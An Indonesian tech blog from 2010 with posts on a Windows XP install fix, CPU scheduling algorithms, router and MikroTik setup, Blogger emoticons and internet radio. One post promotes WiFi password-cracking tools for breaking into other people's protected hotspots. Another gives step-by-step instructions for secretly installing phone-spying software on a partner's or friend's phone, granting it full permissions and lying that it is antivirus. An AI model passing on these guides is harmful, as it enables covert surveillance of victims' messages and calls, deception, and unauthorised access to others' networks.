Minggu, 19 Desember 2010

Menanggulangi masalah blue screen

Kemarin pada saat laptop saya tinggal sebentar terus ada yang aneh knp pada saat komputer hidup kondisi laptop saya muncul box dialog log in padahal saya tidak menggunakan password nah masalahnya baru kelihatan setelah saya scan ternyata di laptop saya terjangkit virus aneh lalu saya bantai tetapi gak bisa ke bantai saya agak terkejut karena layar selalu memunculkan BSOD seperti di bawah ini saat Menu Instalasi Windows akan tampil.



Saya coba ganti CD (pada awalnya saya pikir kesalahan ada pada CD yang rusak) tapi hal itu tetap saja terjadi. Langsung saja saya tanya ke mbah google untuk dapetin solusinya. Setelah agak lama mencari, akhirnya ketemu juga penyebab beserta solusinya.

Rata-rata Laptop jaman sekarang sudah berupa paket bundling Windows Vista. Tentu ada alasannya, salah satunya karena Windows Vista pada masternya sudah mendukung teknologi AHCI, yaitu semacam teknologi yang berkaitan dengan hard disk kalian semua. Sementara Windows XP belum mendukung teknologi itu, dan apabila di-install menggunakan Windows XP, saat masuk di lembar deteksi Harddisk.. terjadi bluescreen.. Sebenarnya masalahnya adalah Windows XP SP1/SP2 tidak mengenal AHCI, berarti kita harus membuat CD Instalasi Windows XP ini mengenal IDE/SATA agar bisa diistall Windows XP SP2. Berikut ini cara yang ku coba dan telah berhasil.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Beberapa Program yang dibutuhkan
a. Microsoft .NET Framework Version 2.0
b. nLite
c. ICH9 sata driver (Copy dahulu driver Hardisk Sata laptop kalian yang ada pada cd driver yg diberikan saat pembelian laptop. Atau jika tidak ada silahkan download di situs resmi pabrikan laptop anda. dan saat ini saya mencontohkan dengan menggunakan ICH9 sata driver untuk Laptop CQ40-108TU yang bisa didownload

Setelah semua ada, terlebih dulu install Net framework. Setelah selesai install nLite.

Langkah selanjutnya :


1. Masukkan CD Instalasi Windows XP

2. Jalankan nLite



3. Tekan Next..



4. Browse letak CD Instalasi Windows XP (yang terdapat folder i386 didalamnya). OK


Buat folder untuk menyimpan hasil konfigurasi contoh "c:\temp"



5. Browse folder yang telah dibuat. OK.. tunggu proses Copy sampai selesai


Proses Copy...



6. Copy selesai.. Next..



7. Presets. Next...



8. Task Selection. Pilih Drivers dan Bootable ISO. Next...



9. Insert. Single driver... Browse cari file "iaAHCI.inf" dari folder hasil ekstrak file "f6flpy32_85.zip" yang telah di download sebelumnya.



10. Hati-hati saat option ini muncul, pilih "ICH9M-E/M SATA AHCI Controller"... OK.. Next..



11. Yes, berhasil ...



12. Next..



13. Pilih Make ISO.. Browse Folder dan Save.... untuk membuat file ISO yang nantinya di Burn ke CD menggunakan Nero Burning dan program sejenis lainnya.

Next untuk Selesai.......
Selamat, dan silahkan Instal Ulang Anda....:smiley_beer:


Catatan : Meskipun bukan tipe CQ40-108TU, tips ini masih digunakan selama laptop kalian masih produk Hp Compaq, dan untuk tipe pabrikan lain, tinggal sesuaikan sata drivernya
Read More

Sabtu, 18 Desember 2010

Algoritma Penjadwalan

Algoritma Penjadwalan

 Penjadwalan proses yaitu kumpulan kebijaksanaan dan mekanisme di system operasi yang berkaitan dengan urutan kerja yang dilakukan oleh sistem computer. Adapun tugas penjadwalan yaitu untuk memutuskan 1.proses yang harus berjalan 2.kapan dan brapa lama proses itu berjalan. Ini adalah gambar type2 penjadwalan:

Disini saya akan membahas mengenai algoritma penjadwalan proses diantaranya :
  1. Round robin
  2. MFQ(Multiple feedback Queue)
  3. SRF(Short Ratio First)
  4. HRN(Highest Ratio next)
  5. PS(Priority Scheduling)
  6. GR(Guaranteed Scheduling)
  7.  Preemptive Shortest Job First (PSJF)
  8. First In First Out (FIFO) 
1 Round Robin
Merupakan Penjadwalan yang paling tua, sederhana, adil,banyak digunakan algoritmanya dan mudah diimplementasikan. Penjadwalan ini bukan dipreempt oleh proses lain tetapi oleh penjadwal berdasarkan lama waktu berjalannya proses (preempt by time). Penjadwalan tanpa prioritas. Berasumsi bahwa semua proses memiliki kepentingan yang sama, sehingga tidak ada prioritas tertentu.
Semua proses dianggap penting sehingga diberi sejumlah waktu oleh pemroses yang disebut kwanta (quantum) atau time slice dimana proses itu berjalan. Jika proses masih running sampai akhir quantum, maka CPU akan mempreempt proses itu dan memberikannya ke proses lain. Penjadwal membutuhkannya dengan memelihara daftar proses dari runnable. Ketika quantum habis untuk satu proses tertentu, maka proses tersebut akan diletakkan diakhir daftar (list), seperti nampak dalam gambar berikut ini :

Algoritma yang digunakan :
1. Jika kwanta habis dan proses belum selesai, maka proses menjadi runnable
dan pemroses dialihkan ke proses lain.
2. Jika kwanta belum habis dan proses menunggu suatu kejadian (selesainya
operasi I/O), maka proses menjadi blocked dan pemroses dialihkan ke proses lain.
3. Jika kwanta belum habis tetapi proses telah selesai, maka proses diakhiri dan
pemroses dialihkan ke proses lain.

Penjadwalan ini :
a. Baik untuk sistem interactive-time sharing dimana kebanyakan waktu
dipergunakan menunggu kejadian eksternal.
Contoh : text editor, kebanyakan waktu program adalah untuk menunggu
keyboard, sehingga dapat dijalankan proses-proses lain.
b. Tidak cocok untuk sistem waktu nyata apalagi hard-real-time applications.

2 Multiple Feedback Queues (MFQ)
Algoritma ini merupakan penjadwalan berprioritas dinamis Penjadwalan ini  bertujuan untuk mencegah (mengurangi) banyaknya swapping dengan proses-proses yang
sangat banyak menggunakan pemroses (karena menyelesaikan tugasnya memakan waktu lama) diberi jatah waktu (jumlah kwanta) lebih banyak dalam satu waktu.
Penjadwalan ini juga menghendaki kelas-kelas prioritas bagi proses-proses yang ada. Kelas tertinggi berjalan selama satu kwanta, kelas berikutnya berjalan selama dua kwanta, kelas berikutnya berjalan empat kwanta, dan seterusnya.
Proses yang masuk untuk pertama kali ke sistem langsung diberi kelas tertinggi. Mekanisme ini mencegah proses yang perlu berjalan lama swapping berkali-kali dan mencegah proses-proses interaktif yang singkat harus menunggu lama.
berikut ini proses algoritmanya:

3 Short Ratio First (SRF)
Merupakan penjadwalan berprioritas.dinamis.Preemptive untuk timesharing dan Melengkapi SJF Pada SRF,  proses dengan sisa waktu jalan diestimasi terendah dijalankan, termasuk proses-proses yang baru tiba.Pada SJF, begitu proses dieksekusi, proses dijalankan sampai selesai.Pada SRF, proses yang sedang berjalan (running) dapat diambil alihproses baru dengan sisa waktu jalan yang diestimasi lebih rendah.
Kelemahan :
•         Mempunyai overhead lebih besar dibanding SJF. SRF perlu penyimpanan waktu layanan yang telah dihabiskan job dan kadang-kadang harus menangani peralihan.
•         Tibanya proses-proses kecil akan segera dijalankan.
•         Job-job lebih lama berarti dengan lama dan variasi waktu tunggu lebih lama dibanding pada SJF.
SRF perlu menyimpan waktu layanan yang telah dihabiskan , menambah overhead. Secara teoritis, SRF memberi waktu tunggu minimum tetapi karena overhead peralihan, maka pada situasi tertentu SFJ bisa memberi kinerja lebih baik dibanding SRF.
4 Highest Ratio Next (HRN)
Algoritma ini merupakan Penjadwalan berprioritas dinamis Penjadwalan untuk mengoreksi kelemahan SJF. Adalah strategi penjadwalan dengan prioritas proses tidak hanya merupakan
fungsi waktu layanan tetapi juga jumlah waktu tunggu proses. Begitu proses mendapat jatah pemroses, proses berjalan sampai selesai. Prioritas dinamis HRN dihitung berdasarkan rumus :
Prioritas = (waktu tunggu + waktu layanan ) / waktu layanan Karena waktu layanan muncul sebagai pembagi, maka job lebih pendek berprioritas lebih baik, karena waktu tunggu sebagai pembilang maka proses yang telah menunggu lebih lama juga mempunyai kesempatan lebih bagus. Disebut HRN, karena waktu tunggu ditambah waktu layanan adalah waktu tanggap, yang berarti waktu tanggap tertinggi yang harus dilayani.
5 Priority Scheduling (PS)
Adalah tiap proses diberi prioritas dan proses yang berprioritas tertinggi mendapat jatah waktu lebih dulu (running). Berasumsi bahwa masing-masing proses memiliki prioritas tertentu, sehingga akan dilaksanakan berdasar prioritas yang dimilikinya. Ilustrasi yang dapat memperjelas prioritas tersebut adalah dalam komputer militer, dimana proses dari jendral berprioritas 100, proses dari kolonel 90, mayor berprioritas 80, kapten berprioritas 70, letnan berprioritas 60 dan seterusnya. Dalam UNIX perintah untuk mengubah prioritas menggunakan perintah nice.
Keunggulan dari algoritma ini mudah diimplementasikan dan mempunyai overhead relative kecil. Kelemahan Tidak tanggap terhadap perubahan lingkungan yang mungkin menghendaki dan penyesuaian prioritas.
Proses-proses yang sangat banyak operasi masukan/keluaran menghabiskan kebanyakan waktu menunggu selesainya operasinya masukan/keluaran. Prosesproses ini diberi prioritas sangat tinggi sehingga begitu proses memerlukan pemroses segera diberikan, proses akan segera memulai permintaan masukan/keluaran berikutnya sehingga menyebabkan proses blocked menunggu selesainya operasi masukan/keluaran. Dengan demikian pemroses dapat dipergunakan proses-proses lain. Proses-proses I/O berjalan paralel bersama proses-proses lain yang benar-benar memerlukan pemroses, sementara prosesproses I/O itu menunggu selesainya operasi DMA. Proses-proses yang sangat banyak operasi I/O-nya, kalau harus menunggu lama untuk memakai pemroses (karena prioritas rendah) hanya akan membebani memori, karena harus disimpan tanpa perlu proses-proses itu dimemori karena tidak selesai-selesai menunggu operasi masukan dan menunggu jatah pemroses.

6 Guaranteed Scheduling (GS)
Penjadwalan ini memberikan janji yang realistis (memberi daya pemroses yang sama) untuk membuat dan menyesuaikan performance adalah jika ada N pemakai, sehingga setiap proses (pemakai) akan mendapatkan 1/N dari daya pemroses CPU. Untuk mewujudkannya, sistem harus selalu menyimpan informasi tentang jumlah waktu CPU untuk semua proses sejak login dan juga berapa lama pemakai sedang login. Kemudian jumlah waktu CPU, yaitu waktu mulai login dibagi dengan n, sehingga lebih mudah menghitung rasio waktu CPU. Karena jumlah waktu pemroses tiap pemakai dapat diketahui, maka dapat dihitung rasio antara waktu pemroses
yang sesungguhnya harus diperoleh, yaitu 1/N waktu pemroses seluruhnya dan waktu pemroses yang telah diperuntukkan proses itu. Rasio 0,5 berarti sebuah proses hanya punya 0,5 dari apa yang waktu CPU miliki dan rasio 2,0 berarti sebuah proses hanya punya 2,0 dari apa yang waktu CPU miliki. Algoritma akan menjalankan proses dengan rasio paling rendah hingga naik
ketingkat lebih tinggi diatas pesaing terdekatnya. Ide sederhana ini dapat diimplementasikan ke sistem real-time dan memiliki penjadwalan berprioritas dinamis.

Algoritma Preemptive Shortest Job First

Preemptive Shortest Job First (PSJF)

Nama Proses Saat Tiba Lama Proses
A
B
C
D
E
0
0
0
0
0
7
10
2
4
8
Gambar Kasus I – antrian lima proses dengan saat tiba = 0
Nama Proses Saat Tiba Lama Proses
A
B
C
D
E
0
1
8
2
5
7
10
2
4
8
Gambar Kasus II – antrian lima proses saat tiba berbeda
Preemptive Shortest Job First (PSJF) disebut juga sebagai teknik Proses Terpendek Dipertamakan Preempsi (PTDP).  PSJF merupakan penjadwalan dengan prioritas dan dengan preempsi.  Prioritas didasarkan kepada pendeknya sisa proses.  Makin pendek sisa proses makin tinggi prioritasnya.  Selanjutnya dengan ketentuan ini, ketika tiba, proses terpendek di bagian belakang antrian tidak saja berpindah ke bagian depan antrian, melainkan juga melalui preempsi, mengeluarkan proses yang pada saat itu berada di dalam proses (jika ada).


Digunakan dua langkah untuk melihat pelaksanaan penjadwalan ini. Langkah pertama: setiap kali, perhatikan saat proses tiba atau saat proses rampung.  Langkah kedua: hitung lama sisa proses dari semua proses yang ada pada saat itu.  Kalau ada proses dengan sisa proses yang lebih pendek dari sisa proses pada proses yang sedang dikerjakan, maka atas dasar preempsi, proses yang sedang dikerjakan itu dikeluarkan dari prosesor.  Dan sebagai gantinya, proses dengan sisa terpendek itulah yang dikerjakan oleh prosesor.
Di sini muncul pertanyaan.  Bagaimana jika proses yang tiba berikut itu memiliki lama proses yang sama dengan sisa proses pada proses yang sudah ada.  Apakah preempsi terjadi juga?  Jika lama proses atau sisa proses adalah sama, maka perlakuan diatur berdasarkan urutan antrian yang ada.
Agar lebih jelas, mari melihat contoh pada kasus II kita menemukan sekumpulan proses dengan tiba berbeda seperti tampak pada Gambar berikut.
Nama
Proses
Saat
Tiba
Lama
Proses
Saat
Mulai
Saat
Rampung
Waktu
Sia-Sia
Lama
Tanggap
A
B
D
E
C
0
1
2
5
8
7
10
4
8
2
0
21
7
13
11
7
31
11
21
13
0
20
5
8
3
7
30
9
16
5




Jumlah
Rerata
36
7,2
67
13,4
Gambar Unjuk kerja prosesor dengan algoritma PSJF untuk kasus II
Gambar Barisan saat algoritma PSJF untuk kasus II
Gambar Barisan saat algoritma PSJF untuk kasus II
8)      First In First Out (FIFO)
First In First Out (FIFO) merupakan penjadwalan tidak berprioritas. FIFO adalah penjadwalan paling sederhana, yaitu proses-proses diberi jatah waktu pemroses berdasarkan waktu kedatangan. Pada saat proses mendapat jatah waktu pemroses, proses dijalankan sampai selesai.
Penilaian penjadwalan ini berdasarkan kriteria optimasi :
 -Adil, dalam arti resmi (proses yang datang duluan akan dilayani lebih dulu), tapi dinyatakan tidak adil karena job-job yang perlu waktu lama membuat job-job pendek menunggu. Job-job yang tidak penting dapat membuat job-job penting menunggu lama.
 -Efisiensi, sangat efisien.
- Waktu tanggap sangat jelek, tidak cocok untuk sistem interaktif apalagi untuk sistem waktu nyata.
-Turn around time kurang baik.
-Throughtput kurang baik. FIFO jarang digunakan secara mandiri, tetapi dikombinasikan dengan skema lain.
        Baik untuk sistem batch yang sangat jarang berinteraksi dengan pemakai.
 Contoh : aplikasi analisis numerik, maupun pembuatan tabel.
    Sangat tidak baik (tidak berguna) untuk sistem interaktif, karena tidak memberwaktu tanggap yang baik.
      Tidak dapat digunakan untuk sistem waktu nyata (real-time applications).
Read More

Jumat, 26 November 2010

Software Hacking Wifi

Terkadang kita menemui beberapa hotspot wifi yang diprotect, baik itu dengan password WEP atau WPA2. Sebenarnya password tersebut dapat kita jebol dengan niat dan tekad (yang buruk tentunya hehehehe…), namun ingat – ingatlah karena ini semua illegal meskipun boleh dibilang ndak sampe ditangkap polisi. Ibaratnya kita menduplikatkan kunci rumah seseorang dan membuka pintu rumahnya namun tidak mencuri,
Sebenarnya di dunia maya bertebaran bermacam – macam software hacking wifi… tinggal kita mau belajar dan menyimaknya saja. Plus ketelatenan. Coba saja ketik hacking wifi di youtube, maka akan hadir berjibun caranya. Software yang mau saya bagi adalah airowizard. Program ini merupakan bentuk yang lebih user friendly dari aircrack. Berguna untuk membaca lalu lintas data packet wifi baik unprotect maupun protect. Lalu menganalisanya dan menghacknya untuk mencari passwordnya. Apabila secara manual penyadapan lalu lintas data ini memerlukan waktu berjam – jam maupun berhari – hari untuk membongkar password WEP/WPA2, maka airowizard hanya butuh 5 menit saja. Sesuai kata – kata pembuatnya sih.Di dunia maya sangat sulit mencari software ini karena banyak pihak yang sirik karena software ini bisa membongkar password wifi secara cepat.
Download Airowizard : Airowizard AWSetup_beta1-rev250a
4,56 Mb

Sebenarnya kalau anda suka cara – cara manual maka airowizard lebih nyaman dan sakti bila digunakan lewat OS linux yaitu Backtrack 3. Backtrack memang didesain untuk security. Asyiknya lagi backtrack juga tersedia dalam versi USB sehingga bisa simpan pada USB kapasitas 1 GB.
Download Backtrack 3 : USB version http://backtrack.mirrors.skynet.be/pub/backtrack/bt3final_usb.iso 783,42 Mb
Saran saya gunakan download manager untuk mempercepat download. Mungkin sekitar 6 jam bila telkom speedy stabil.
Read More

Cara Setting Accesspoint LinkSys

LinkSys WRT54GL Broadband Router merupakan perangkat wirelles yang bisa digunakan sebagai Acces Point dan Router...

untuk men setting wirelless broadband router ini bisa menggunakan Software yang sudah tersedia dari sananya atau bisa menggunakan web Browser.. tapi saya sering men-setting nya menggunakan web browser karena lebih praktis…

langkah pertama

kita reset dulu itu akses poin dengan memencet tombol reset di bagian belakang akses poin selama 10 detik pake paper clip, biar kita yakin settingannya kembali ke default.

Langkah kedua
Selanjutnya setting IP laptop/PC anda dengan IP Default bawaan si LinkSys. untuk IP Default Linksys WRT54GL yaitu 192.168.1.254 atau kalau ga bisa 192.168.1.1 ( soalnya ada 2 versi IP). Kalau sudah sambungkan kabel UTP dari Laptop/PC ini ke akses poin secara langsung.

Langkah ketiga
Kemudian kita browsing pakai Firefox,IE atau yang lainnya..
Trus Ping ke alamat IP defaulnya ex : 192.168.1.1 atau 192.168.1.245

Langkah keempat
maka akan muncul login : kemudian isikan seperti di bawah ini
username : (dikosongkan)
password : admin
Klik OK dan anda akan menemukan halaman setting berbasis web dari akses poin sub menu Linksys..

Langkah kelima
Dalam Sub Menu adalah mensetting IP address Linksys dan teman-temannya, anda bisa lihat sendiri detailnya…
Sebaiknya untuk mengganti IP Address dilakukan di akhir konfigurasi, untuk awal instalasi kita masuk ke Menu Wireless,

Dalam Menu Wireless kita hanya menentukan mode wireless dan SSID, dalam Wireless biasa nya kita mengenal SSID dan Wireless Mode, SSID adalah nama Wireless network yang biasa dikenal oleh orang awam Nama Hostpotnya. Dan Wireless Mode adalah type gelombang yang digunakan.. bila sudah selesai klik Save Setting.

pada intinya bila kita akan men-setting semua Access Point hal yang terpenting adalah men-setting SSID, Cannel, Dan wireless mode, itu sudah bisa di bilang Sebuah Access Point (Hostpot).


Note : Jika anda berencana menghubungkan akses poin ini di jaringan anda yang mempunyai segmen yang berbeda (misalnya selain 192.168.1.*) ubah IP statisnya ke segmen yang sesuai, atau bisa juga pilih DHCP kalau anda tidak ingin memberikan IP Statis. Cuman yang terakhir mungkin anda akan kesulitan untuk menemukan IP akses poin ini nantinya.
Pada web based control panel dari akses poin ini anda bisa mengatur berbagai settingan yang disediakan oleh WAP54G, misalnya Mode, authentikasinya maupun mengganti password default.
Setalah selesai menentukan IP dari WAP54G ini cabut kabel UTP dari Laptop/PC, trus sambungan ke jaringan anda.
Seharusnya anda sudah bisa untuk mengakses web-based control panel akses poin ini dari jaringan anda.
Read More

Kamis, 18 November 2010

Cara Memasang Emoticon Blog

Memasang Emoticon di post Koment


Dengan memasang emoticon di post koment. maka para komentator akan lebih mudah untuk mengekspresikan emosinya serta akan membuat blog Anda lebih menarik lagi.


Untuk memasang emoticon tersebut. Anda harus mengatur post comment agar muncul dibawah postingan. Jika kotak komentar anda berada pada halaman pop-up seperti gambar dibawah ini maka anda harus merubahnya terlebih dahulu agar disemat dibawah entri.








Bagi anda yang kotak komentarnya berada pada halaman pop-up. BukaPengaturan - Komentar - Penempatan Formulir Komentar - Disemat dibawah Entri.

1. Jika sudah klik Layout - Edit HTML

2. Beri tanda centang pada Expand Widget Templates

3. Cari kode </body>

4. Lalu letakkan kode dibawah ini diatas kode </body>

<script src='http://oom.blog.googlepages.com/smiley.js' type='text/javascript'/>

5. Kemudian Anda cari kode berikut ini :

<p class='comment-footer'> 

<b:if cond='data:post.embedCommentForm'>

6. Kalau sudah ketemu, letakkan kode yang ada dibawah ini, dibawah

<p class="comment-footer">

<b><img border="0" src="http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/21.gif"/>
:))
<img border="0" src="http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/100.gif"/>
:)]
<img border="0" src="http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/71.gif"/>
;))
<img border="0" src="http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/5.gif"/>
;;)
<img border="0" src="http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif"/^gt;
:D
<img border="0" src="http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/3.gif"/>
;)
<img border="0" src="http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/10.gif"/>
:p
<img border="0" src="http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/20.gif"/>
:((
<img border="0" src="http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/1.gif"/>
:)
<img border="0" src="http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/2.gif"/>
:(
<img border="0" src="http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/8.gif"/>
:X
<img border="0" src="http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/12.gif"/>
=((
<img border="0" src="http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/13.gif"/>
:-o
<img border="0" src="http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/7.gif"/>
:-/
<img border="0" src="http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/11.gif"/>
:-*
<img border="0" src="http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/22.gif"/>
:
<img border="0" src="http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/35.gif"/>
8-}
<img border="0" src="http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/102.gif"/>
~x(
<img border="0" src="http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/104.gif"/>
:-t
<img border="0" src="http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/66.gif"/>
b-(
<img border="0" src="http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/62.gif"/>
:-L
<img border="0" src="http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/14.gif"/>
x(
<img border="0" src="http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/24.gif"/>
=))
</b>


7. Jangan Lupa untuk Save.

Read More

Rabu, 17 November 2010

MEMBANGUN JARINGAN MULTI HOP DENGAN PC ROUTER ( MIKROTIK OS )

:cd Jaringan Multi Hop / internetworking adalah menghubungkan antara dua LAN dan WAN dengan menggunakan router sebagai media dan mengkonfigurasikan alamat logical jaringan dengan protocol seperti IP. Router berfungsi untuk memisahkan broadcast domain, broadcast domain sendiri yaitu kumpulan dari alat-alat di sebuah segmen network yang menerima semua paket broadcast yang dikirim oleh alat-alat yang di segmen tersebut, selain itu router juga berfungsi memisahkan collision domain ( collision adalah kondisi di mana terjadi tabrakan antar data karena berada pada waktu dan tempat yang sama seperti pada sebuah kabel jaringan ). MikroTik RouterOS adalah sistem operasi dan perangkat lunak yang dapat digunakan untuk menjadikan komputer manjadi router network yang handal, mencakup berbagai fitur yang dibuat untuk ip network dan jaringan wireless, cocok digunakan oleh ISP dan provider hotspot. Ada beberapa langkah dalam membangun jaringan multi hop dengan PC Router, diantaranya yaitu:
A.Mempersiapkan PC Router sesuai dengan design jaringan
1.Mempersiapkan PC dengan minimal 2 ethernet yang dikenali oleh Mikrotik OS
2.Instalasi Mikrotik OS
3.Setting parameter administrasi router dan pengenalan perintah dasar Mikrotik
4.Setting parameter jaringan untuk masing-masing interface pada router (interface, IP address, netmask, dll)

B.Mengkonfigurasi mesin-mesin pada masing-masing segmen jaringan
1.Mengkonfigurasi IP address dan Subnet
2.Mengkonfigurasi gateway

C.Testing Koneksi
1.Menggunakan ping
2.Menggunakan traceroute.

Langkah setting Mikrotik Via WinBox
1. Setelah install Mikrotik sudah OK, selanjutnya masukkan IP sembarang untuk remote.
Misal
ip address add address 192.168.1.254 netmask 255.255.255.0 interface ether2
Kemudian buka browser dengan alamat IP tadi, dan download Winbox
2. Buka Winbox yang telah di download tadi
3. Di tampilan Winbox, pada kolom Connect To masukkan no IP tadi (192.168.1.254) dengan
Login : admin password : kosong. Kemudian klik tombol Connect
JIka log in berhasil, maka langkah selanjutnya yaitu setting parameter untuk masing-masing interface pada router (interface, IP address, netmask, dll.).

Langkah setting Mikrotik Via Console
Setting Mikrotik via Console langkah pertamanya sama seperti via winbox yaitu log in terlebih dahulu. Dalam Mikrotik terdapat perintah-perintah khusus yang telah disediakan. Berikut merupakan contoh-contoh perintah dalam tampilan console:
-Untuk keamanan ganti password default
[admin@Mikrotik]>password
Old password: *****
New password: *****
Retype new password: *****
[admin@]Mikrotik>

-Mengganti nama Mikrotik Router (Misal nama server akan diganti menjadi “Herinet”
[admin@Mikrotik]> system identity set name = Herinet
[admin@Herinet]>

-Melihat interface pada Mikrotik Router
[admin@Herinet]> interface print
Flag: X - disabled, D - dynamic, R - running
#NAME TYPE RX-RATE TX-RATE MTU
0 R ether1 ether 0 0 1500
1 R ether2 ether 0 0 1500

-Mengganti nama interface
[admin@Herinet]> interface set 0 name = x1
[admin@Herinet]> interface set 0 name = x2


Read More

Minggu, 14 November 2010

Menyadap SMS dan Telepon

Bloove adalah salah satu website penyedia layanan untuk menyadap SMS dan telepon dari handphone yang kita miliki. Cara untuk menyadap SMS dan Telepon handphone dengan bloove ini saya dapat ketika salah satu bos saya minjam laptop kesayanganku. Katanya untuk transfer data. Penasaran, aku intip sejenak. Ternyata dia koneksi internet dan membuka situs www.bloove.com.

Apa itu Bloove ? Bloove adalah salah satu tokoh kartun tersexy yang pernah saya kenal. Hehehehe, Bercanda.

Dengan website Bloove ini kita bisa memata-matai penggunaan sms dan panggilan juga isi phonebook handphone baik milik pribadi maupun milik orang lain yang sudah kita daftarkan.

Berikut 2 keunggulan yang dimiliki oleh website penyedia layanan penyadap SMS dan telepon yaitu Bloove :

Keunggulan pertama Bloove :

1. Bisa melihat semua panggilan & sms di hp kita lewat warnet, jika hp ketinggalan dirumah.
2. Bisa langsung balas sms lewat internet dengan sender tetap nomor kita
3. Bisa melacak pengguna hp kita kalo sewaktu-waktu hilang

Keunggulan kedua bloove, ini berguna kalo kita berniat memata-matai orang (pacar, teman, atau siapapun) kelebihannya :

1. Bisa melihat semua panggilan & sms di hp target lewat warnet atau komputer kita.
2. Bisa langsung balas sms menyebalkan lewat internet dengan sender tetap nomor target.
3. Yang paling jahat, kamu bisa hapus semua phonebook di hp target. Jangan sampai setega ini ya…

Berikut cara mendaftar bloove :

1. cek dulu apakah handphone yang mau disadap didukung gak ama situs ini.
2. bila didukung, unduh aplikasi clientnya di hape target agar dapat mengirim data ke situs bloove di http://bloove.com/m. lalu install di hape target.
3. setelah terinstall pilih icon Bloove Agent, tapi jangan dibuka terlebih dahulu, tapi tekan :

Option > Application access > Communication > Network access > Always allowed > Yes

Option > Application access > Communication > Messaging > Always allowed > Yes

Option > Application access > Communication > Connectivity > Always allowed > Yes

Option > Application access > Data access > Multimedia recording > Always allowed > Yes

Option > Application access > Data access > Read user data > Always allowed > Yes

Option > Application access > Data access > Add and edit data > Always allowed > Yes

Option > Application access > Data access > Smart card > Always allowed > Yes

Option > Application access > Auto-start > Always allowed > Yes

Setelah itu baru kita tekan icon Bloove Agent. setelah selesai catat ID yang muncul untuk registrasi yang formatnya XXXX-XXXX-XXXX.

4. lalu kembali gunakan komputer anda, lalu buka link ini : www.bloove.com dan klik Sign Up, isi ID yang sudah dicatat yang formatnya XXXX-XXXX-XXXX ke Agent ID & ikuti petunjuk dibawahnya.

5. Jika jaringan GPRS di hp target tidak hilang, maka kita langsung terhubung ke server yang sudah menerima data dari target. Secara otomatis server akan men-syncronize data di hp target dan ditampilkan di layar monitor. Dengan gambar hp target & tulisan “online”.

Kekurangan yang paling menggangu dari bloove ini, yaitu dia harus terus berjalan. jadi tidak boleh ditutup. jadi untuk menggunaan minimal harus di minimize. nah trik tambahan, untuk alasan kita semisal kita menggunakan aplikasi bloove agent di handphone orang lain, kita bisa katakan kalau program ‘Bloove Agent‘ yang diinstall di handphone target tersebut adalah antivirus atau dengan cara apapun atau rayuan apapun. Asal jangan Rayuan gombal. Hahahahaha….

selain itu, aplikasi ini dalam rentang waktu yang dapat kita set sendiri harus koneksi ke server Bloove jadi sekali-kali dia akan otomatis koneksi gprs.

Selamat mencoba dan selamat menjadi agen rahasia dengan website untuk menyadap SMS dan telepon handphone seperti James Bond dengan Bloove ini.
Read More

Jumat, 05 November 2010

Membangun Radio Internet dengan Listen2MyRadio.Com

Artikel berjudul Membangun Sendiri Radio Internet yang saya tulis dua tahun lalu ternyata masih banyak dibaca pengunjung situs blog ini. Khususnya bagi yang tertarik untuk membangun sendiri radio internet untuk tujuan hobi maupun profesional. Dari komentar yang masuk, banyak yang mengeluhkan sulitnya menemukan perusahaan hosting yang mau menghosting shoutcast server untuk radio internet. Jadi meskipun radio sudah bisa online di jaringan LAN, tapi akhirnya kesulitan untuk online di Internet. Sebenarnya ada solusi yang mudah dan gratis, khususnya terkait dengan penempatan shoutcast server, yaitu dengan menggunakan shoutcast server yang disediakan gratis oleh Listen2MyRadio.Com. Masih tertarik membangun radio internet dengan modal server gratisan? Ikuti terus artikel ini.

Seperti artikel sebelumnya, untuk mempermudah penjelasan, saya akan sampaikan dalam bentuk step-by-step instalasi, baik untuk server (Listen2MyRadio.Com) maupun untuk client yang mengalirkan konten siaran ke server.

INSTALASI SERVER RADIO DI LISTEN2MYRADIO.COM

1. Daftarkan diri (signup) melalui form pendaftaran di Listen2MyRadio.Com





2.Konfirmasi pendaftaran dengan mengklik URL yang dikirimkan oleh Listen2MyRadio.Com ke email kita





3. Login ke Listen2MyRadio.Com. Setelah login akan muncul menu administrasi seperti gambar di bawah.





4. Klik “radio installation” untuk mulai mensetup nama radio, alamat URL radio, juga password untuk broadcaster dan admin. Disini saya set misalnya password: “romi” dengan url: ikc.listen2myradio.com



5. Setelah instalasi server radio selesai, kembali ke bagian menu, dan pilih “preferences“. Apabila server sudah normal berjalan maka tanda “ON” berwarna hijau akan muncul. Jangan lupa catat “address to broadcast” (misalnya disini: 91.186.30.12) beserta nomor “port” (16532) karena akan kita gunakan di client pengirim konten radio (winamp).



6. Apabila server tetap dalam keadaan “OFF“, maka kita harus memilih server baru. Caranya adalah di menu klik pilihan “have problem with radio? change server to a better one“, dan pilih (klik PRESS HERE) salah satu dari beberapa pilihan server yang ada di sana. Perlu dicatat bahwa pengubahan server tentu akan membuat “address to broadcast” kita juga berubah.



Sampai disini instalasi server radio di Listen2MyRadio sudah kita selesaikan. Langkah berikutnya sebenarnya sama dengan langkah ke 3-9 artikel saya sebelumnya tentang membangun sendiri radio internet. Tapi saya akan ulangi tahapannya supaya bisa lebih jelas.

INSTALASI CLIENT PENGALIR KONTEN KE SERVER LISTEN2MYRADIO.COM

